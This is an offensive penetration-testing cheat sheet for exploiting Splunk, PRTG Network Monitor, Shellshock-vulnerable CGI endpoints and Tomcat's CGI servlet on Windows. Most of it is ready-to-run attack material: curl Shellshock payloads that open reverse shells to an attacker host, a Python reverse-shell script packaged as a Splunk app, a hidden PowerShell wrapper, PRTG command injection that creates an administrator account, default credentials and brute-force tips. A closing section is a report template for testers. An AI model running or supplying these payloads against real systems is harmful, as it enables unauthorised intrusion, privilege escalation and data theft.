π‘οΈ Methodology Checklist
- Splunk: admin interface on port 8000/8089
- Default creds: admin/changeme β if changed, brute-force or credential spray
- Splunk RCE: upload malicious app (Python/Bash script)
- PRTG: port 80/443/8080 β default PrtgAdm1n or prtgadmin/prtgadmin
- PRTG CVE-2018-9276: command injection via notifications
- CGI shellshock:
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1" http://[TARGET]/cgi-bin/test.cgi - Check CGI-BIN path for outdated scripts
π― Operational Context
Use when: Splunk, PRTG Network Monitor, or CGI-enabled web server identified β exploit Splunk RCE via custom app upload, PRTG command injection, or Shellshock on CGI.
Think Dumber First: Splunk with admin creds = instant RCE via custom app upload (malicious .spl file). PRTG default creds: prtgadmin/prtgadmin. CGI endpoint? Try Shellshock: curl -H 'User-Agent: () { :; }; echo; echo; /bin/id'.
Skip when: No admin access to Splunk/PRTG and no credential brute-force path.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nmap -sV -p 8000,8089 [TARGET_IP] | Splunk ports: 8000 (Web UI), 8089 (REST API) |
curl -k https://[TARGET_IP]:8089/services/server/info | Unauthenticated Splunk version via REST API |
tar -cvzf updater.tar.gz splunk_shell/ | Package Splunk malicious app for deployment |
nc -lvnp [LPORT] | Catch Splunk reverse shell (fires within 10s of upload) |
nmap -sV -p- --open -T4 [TARGET_IP] | Full scan to find PRTG on 80/443/8080 |
curl -s http://[TARGET_IP]:[PORT]/index.htm -A "Mozilla/5.0" | grep version | PRTG version check |
nxc smb [TARGET_IP] -u [USER] -p [PASS] | Verify PRTG-created local admin via SMB |
evil-winrm -i [TARGET_IP] -u [USER] -p [PASS] | Interactive session after PRTG privesc |
gobuster dir -u http://[TARGET_IP]/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi,sh | Find CGI scripts for Shellshock |
curl -H "User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgi | Shellshock (CVE-2014-6271) information leak |
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgi | Shellshock reverse shell |
π¬ Deep Dive & Workflow
Splunk RCE via Malicious App
# Directory structure (case-sensitive on Linux)
splunk_shell/
βββ bin/
β βββ rev.py # Linux payload
β βββ run.bat # Windows wrapper
β βββ run.ps1 # Windows payload
βββ default/
βββ inputs.conf # Trigger configinputs.conf:
[script://./bin/rev.py]
disabled = 0
sourcetype = shell
interval = 10
[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10Linux rev.py:
import sys,socket,os,pty
s=socket.socket()
s.connect(("[LHOST]",int([LPORT])))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')Windows run.bat:
@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
ExitDeploy: Web UI (port 8000) β Gear icon β Install app from file β check βUpgrade appβ.
Default creds: admin:changeme. Free version (expired trial) β no auth at all.
Cleanup: Remove app immediately β it calls back every 10 seconds and creates logs.
PRTG CVE-2018-9276 (Authenticated Command Injection)
Affects: PRTG < 18.2.39
Auth: prtgadmin:prtgadmin (default)
Execution: NT AUTHORITY\SYSTEM (Windows)
Blind: no command output in UI
Path:
1. Setup β Account Settings β Notifications β Add new notification
2. Check "EXECUTE PROGRAM"
3. Program File: Demo exe notification - outfile.ps1
4. Parameter: test.txt;net user [USER] [PASS] /add;net localgroup administrators [USER] /add
(or base64 PS reverse shell)
5. Save β click Test button in notification list
6. Wait 15-30s β shell pops or verify via CrackMapExec
Base64 reverse shell: Generate at RevShells.com β βPowerShell #3 (Base64)β β inject as: test.txt; powershell -e [BASE64]
CGI / Shellshock (CVE-2014-6271)
Targets: Bash < 4.3 + CGI enabled + User-Agent passed to env
Found at: /cgi-bin/*.cgi, /cgi-bin/*.sh, /cgi-bin/*.pl
Payload structure:
() { :; }; β marks start of function definition
echo; echo; β blank line separates HTTP headers from body
/bin/cmd β actual injected command
Confirm vulnerability (information leak):
curl -H "User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgiReverse shell:
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgiPitfalls:
| Issue | Fix |
|---|---|
| 500 error | Add echo; echo; before command |
| 200 OK empty | Try Referer header instead of User-Agent |
| No callback | Use absolute path: /bin/bash not bash |
| Patched Bash | Shellshock is all-or-nothing β move to other vectors |
Tomcat CGIServlet RCE (Windows β CVE-2019-0232)
Apache Tomcat on Windows with the CGI servlet enabled (enableCmdLineArguments) lets you inject command-line arguments through the URL β calling a .bat CGI script and pointing it at an absolute Windows binary path.
# URL-encoded: c%3A%5C... = c:\windows\system32\whoami.exe
curl "http://[TARGET_IP]:8080/cgi/cmd.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe"- Distinct from Shellshock β this is Windows/Tomcat-specific, not Bash.
- Find the CGI dir first (
/cgi/,/cgi-bin/); the script must be a.bat/.cmdhandler.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Splunk custom app upload blocked | Non-admin account | Splunk RCE requires admin; brute admin account or find creds in config files |
| PRTG default creds fail | Changed from default | Try: prtgadmin/prtgadmin, admin/admin, year-based passwords; check PRTG config files for stored creds |
| Shellshock test returns nothing | CGI not executing bash | Verify CGI: nmap --script http-shellshock [TARGET]; only works on CGI handlers using bash |
| Splunk .spl app install fails | Wrong format | .spl is a .tar.gz; create: tar czf app.spl app/; must contain default/ or bin/ directory |
| PRTG command injection in sensor | Wrong parameter | PRTG CVE-2018-9276: inject via sensor notification, not standard parameter |
π Reporting Trigger
Finding Title: Splunk/PRTG Default Credentials Enable Authenticated RCE Impact: Default or weak credentials on Splunk or PRTG provide admin access enabling immediate remote code execution through legitimate admin functionality (Splunk app upload, PRTG notifications), compromising the monitoring server and all hosts it can reach. Root Cause: Default credentials not changed during deployment. Monitoring applications not included in hardening standards. No MFA on admin interfaces. Recommendation: Change all default credentials on deployment. Implement MFA on Splunk and PRTG admin interfaces. Restrict admin access to management network. Regular credential audit of all monitoring platforms.